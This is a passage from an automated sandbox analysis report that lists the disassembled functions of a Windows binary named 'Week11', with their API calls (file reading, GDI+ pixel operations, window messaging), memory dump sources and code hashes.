                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Rect$CopyOffset
                                • String ID: 9JC
                                • API String ID: 2534530997-834187432
                                • Opcode ID: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
                                • Instruction ID: 9b066e3f8fdced23daec9e69e548ea301ea4f196c710a7fa38ee4cd0e35d0dd2
                                • Opcode Fuzzy Hash: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
                                • Instruction Fuzzy Hash: 5CC17071A01209DFDB10DF98C880AEEB7B9FF89304F24915EE505AB341C779AE45CBA5
                                Function 0043A1E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 270COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 0043A24F
                                  • Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ExceptionException@8RaiseThrow
                                • String ID: H3K$H3K$invalid map/set<T> iterator
                                • API String ID: 3976011213-2057606363
                                • Opcode ID: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
                                • Instruction ID: 9317064ab4661ae0508ddb319b9aa231e58ca3e46406a00c9d616f5597bee9ca
                                • Opcode Fuzzy Hash: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
                                • Instruction Fuzzy Hash: 87C1A2709442409FDB51CF15C0C4B5ABBA1AF59318F68E08ED8854F392C3BAEC96CF96
                                Function 0049E5F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(KERNEL32,00490CB1), ref: 0049E5FE
                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0049E60E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                • API String ID: 1646373207-3105848591
                                • Opcode ID: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
                                • Instruction ID: 5d59013588b00adf7d0845515ba78f042050767efe60ab05ea6d9b7fb8e80628
                                • Opcode Fuzzy Hash: 2d09e1f58d27da13e7b422deae5c6b991f59852bedd076ebe9db334e3e7a04e0
                                • Instruction Fuzzy Hash: 0AF01D20A00A09E2DF106BA2BC0A7AF7E79FB80746F9205A1E1A5A0185DF758475D69A
                                Function 0043C1D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(yes), ref: 0043C1DA
                                • VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 0043C1F0
                                • SysFreeString.OLEAUT32(00000000), ref: 0043C1FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: String$AllocBstrFree
                                • String ID: yes
                                • API String ID: 359749342-1978086825
                                • Opcode ID: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
                                • Instruction ID: e600b2d09dd7dddf48b1386afc47337d7b0e41dd9a9f86ff21ded1716e6caa0a
                                • Opcode Fuzzy Hash: 5a693b34c5fa423649dc46686fdeadc613667017fc3560e40a658dcea4bf2b5a
                                • Instruction Fuzzy Hash: 1FE0C2321812247FD1105B6A9C99FD73B9CDF46AA0F004116F60487180C9769800C6B8
                                Function 00476670 Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047668C
                                • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 0047672B
                                • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,0047728A,?,00000000,?), ref: 00476747
                                • _memset.LIBCMT ref: 004767EE
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$PointerReadSize_memset
                                • String ID:
                                • API String ID: 1834740430-0
                                • Opcode ID: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
                                • Instruction ID: 6151f60ee9c84707b86d9a20b60ccc22e606c985d082c452e23b09b8a49b0afc
                                • Opcode Fuzzy Hash: 0baaf64e86dd44744958b53e668970a06d0855052843d957aa2a11ef40b6bb02
                                • Instruction Fuzzy Hash: A551AE716047009FD314DE29D880BABB7E5FB88354F55892EF88DD7340EB38E9458B9A
                                Function 004800B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                APIs
                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 004800F8
                                • ColorHLSToRGB.SHLWAPI(000000EF,000000F0,000000F0), ref: 004801FD
                                • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 00480213
                                • ColorHLSToRGB.SHLWAPI(?,?,?), ref: 0048022B
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Color
                                • String ID:
                                • API String ID: 2811717613-0
                                • Opcode ID: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
                                • Instruction ID: 629a250e4147ac8ac128a20f7a24bcb4b596a5fad59d93fec3449513787912b9
                                • Opcode Fuzzy Hash: 0d3920a137d54316e954c7b2983370166ad78e9eaaa24493d36469f3da149905
                                • Instruction Fuzzy Hash: E441797051C3A18BD3448F1A885403FBAE5FBC8715F404E1EF8D9A2295E33CC698DBA6
                                Function 0044A7C0 Relevance: 6.1, APIs: 4, Instructions: 128fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,1D1D1D8C), ref: 0044A81C
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0044A82F
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0044A867
                                • CloseHandle.KERNEL32(00000000), ref: 0044A8E8
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
                                • Instruction ID: cb96d1c1a344abd5dc9de915a8941917d73025fba777b5d6defc882ec8901fa7
                                • Opcode Fuzzy Hash: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
                                • Instruction Fuzzy Hash: 6C41E3B1C00248ABEF10EBE4DC85AEEBBB8EF05314F14462EF51177281DB785A05C769
                                Function 0046E410 Relevance: 6.1, APIs: 4, Instructions: 113windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000113E,00000000,0000F000), ref: 0046E449
                                • SendMessageW.USER32(?,0000110A,00000003,00000201), ref: 0046E4B7
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E4CE
                                • SendMessageW.USER32(?,0000113F,00000000,00000018), ref: 0046E529
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
                                • Instruction ID: 0a50794e182766536891548859ddcfcf6837cfdc01b685d1ec99ee1c727b3b10
                                • Opcode Fuzzy Hash: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
                                • Instruction Fuzzy Hash: DA414C74A00219AFDB14DFAAD881EAEB7F8FF08314F10815AE915A7345EB34ED41CB95
                                Function 00424020 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042403C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424053
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 0042408F
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424113
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
                                • Instruction ID: d2cc8af1bf16ca7be1f00f3773d7ad9c581c7ccd4ca93e8ee6db63fee2bc6e33
                                • Opcode Fuzzy Hash: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
                                • Instruction Fuzzy Hash: 2C3192B0E00229AFDB10DF95D9854BEFBF8FF84705B50855AE915A3200D3386A91CBE4
                                Function 00424140 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042415C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424173
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004241AF
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424226
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
                                • Instruction ID: 0ee44c7dda0063b873c49ff7400baac87b7ce386fedb679ffbc5797c76a402e2
                                • Opcode Fuzzy Hash: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
                                • Instruction Fuzzy Hash: D131E770A00236EFDB14DE96ECC44BEF7B4EB94304B50866BE425D7641C23CA991DBE9
                                Function 00424260 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042427C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424293
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004242CF
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424344
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
                                • Instruction ID: 4e1e74171ca53cadc9a258f722f4827c3c999a49b092120ff199828192a2837b
                                • Opcode Fuzzy Hash: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
                                • Instruction Fuzzy Hash: 6931B871E00536AF9B04DFE6D8C04BFFBB4EE85341B10865EE815A3640D2385945CBF4
                                Function 0042A5B0 Relevance: 6.1, APIs: 4, Instructions: 75fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0042A5DA
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0042A5EA
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0042A622
                                • CloseHandle.KERNEL32(00000000), ref: 0042A634
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
                                • Instruction ID: f76ff96595e95f74c71594774e9d732ce93bf559fa4622e3cdbde4d7c9f374e5
                                • Opcode Fuzzy Hash: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
                                • Instruction Fuzzy Hash: 7911B4317822247BDB219E14AC45FAB776CAF42B10F08029AFC44A7380DBB49D16C7E9
                                Function 00444550 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: __recalloc_memmove_s
                                • String ID:
                                • API String ID: 1992126439-0
                                • Opcode ID: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
                                • Instruction ID: 67bfe94639931a2a40ca0e4519d54b2eabdb7bb960d7e8c4135de81b3624f322
                                • Opcode Fuzzy Hash: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
                                • Instruction Fuzzy Hash: 2D1184B6600B026FE720CE69DD84A6BB3E6EBD4304714CA1EE596C7744EB35E941C750
                                Function 00444730 Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00444751
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00444774
                                • TranslateMessage.USER32(?), ref: 00444791
                                • DispatchMessageW.USER32(?), ref: 00444798
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Message$DispatchPeekTranslate
                                • String ID:
                                • API String ID: 4217535847-0
                                • Opcode ID: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
                                • Instruction ID: 0fac7e69ba9ad83552e9d8b8551bd64ae53e41f683b0e31269322f83ec5c5c78
                                • Opcode Fuzzy Hash: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
                                • Instruction Fuzzy Hash: 93117030301605ABF7219B58CD89BBBB3ADEF86744F244227E605D72D0D768ED13869D
                                Function 0046E2F0 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E316
                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0046E324
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046E34C
                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 0046E365
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
